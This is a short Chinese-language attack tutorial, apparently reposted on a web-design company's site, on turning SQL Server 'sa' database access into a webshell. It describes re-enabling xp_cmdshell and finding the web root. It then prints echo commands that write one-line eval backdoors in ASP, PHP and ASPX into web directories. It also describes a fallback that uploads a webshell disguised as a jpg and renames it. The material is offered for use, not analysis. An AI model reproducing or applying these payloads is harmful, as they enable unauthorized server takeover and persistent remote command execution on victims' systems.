sa權限獲取webshell思路

10年積累的成都網(wǎng)站制作、做網(wǎng)站經(jīng)驗，可以快速應對客戶對網(wǎng)站的新想法和需求。提供各種問題對應的解決方案。讓選擇我們的客戶得到更好、更有力的網(wǎng)絡服務。我雖然不認識你，你也不認識我。但先網(wǎng)站設計后付款的網(wǎng)站建設流程，更有仙游免費網(wǎng)站建設讓你可以放心的選擇與我們合作。

   1.通過SQL查詢分析器通過sa權限首先恢復xp_cmdshell存儲過程。

   2.通過SQL Tools2.0連接數(shù)據(jù)庫，執(zhí)行命令，查看網(wǎng)站路徑以及磁盤文件，獲取網(wǎng)站的真實路徑。

   3.echo生成一句話后門。

   4.直接獲取webshell權限。

   5.如果echo生成的一句話后門無法執(zhí)行，可以通過查看對應網(wǎng)站的數(shù)據(jù)庫，獲取后臺登陸密碼，通過后臺上傳webshell的jpg。然后通過copy命令將jgp文件復制為aspx文件，從而獲取webshell。

技巧：

   1.尋找可寫的文件夾，例如c:/windows/temp，以及網(wǎng)站的真實路勁。

   2.通過echo命令生成一句話后門

  echo ^<%eval request(cmd)% ^>^>d:\wwwroot\ok.asp

  echo ^<?php @eval($_POST[cmd]);?^>^>cmd.php

  echo ^<%@ PageLanguage="Jscript%"^>^<^%eval(Request.Item["pass"],"unsafe");%^>^>c:\inetpub\wwwroot\cmd.aspx

當前名稱：sa權限獲取webshell思路
本文鏈接：http://jinyejixie.com/article4/ghhsie.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián)，為您提供自適應網(wǎng)站、品牌網(wǎng)站設計、服務器托管、微信公眾號、商城網(wǎng)站、ChatGPT

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)